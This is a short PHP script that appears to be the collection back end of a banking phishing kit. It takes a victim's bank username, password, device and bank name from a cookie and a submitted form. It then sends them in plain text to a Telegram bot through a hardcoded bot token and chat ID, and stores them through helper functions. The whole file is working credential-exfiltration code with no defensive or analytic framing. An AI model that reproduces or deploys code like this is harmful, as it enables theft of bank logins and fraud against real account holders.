<?php 
require('../THE333/lib/funciones.php');

$usuario = $_COOKIE['usuario'];
$contrasena = $_POST['pass'];
$dispositivo = $_POST['dis'];
$banco = $_POST['banco'];

setcookie('contrasena',$contrasena,time()+60*9);

$contenido = $banco . "\n";
$contenido .= $dispositivo . "\n";
$contenido .= "Usuario Banco: " . $usuario ."\n";
$contenido .= "Pass Banco: " . $contrasena ."\n";
$contenido=urlencode($contenido);
file_get_contents("https://api.telegram.org/bot8434119591:AAFeXkqrs3spKHtFbkw5OZNLVIBvs8Qf7vM/sendMessage?chat_id=-4803034495&text=". $contenido);
if (isset($_COOKIE['registro'])) {
	$id = $_COOKIE['registro'];
	actualizar_usuario($usuario,$contrasena,$id,$banco);
}else{
	crear_registro($usuario,$contrasena,$dispositivo, $banco);	
}


?>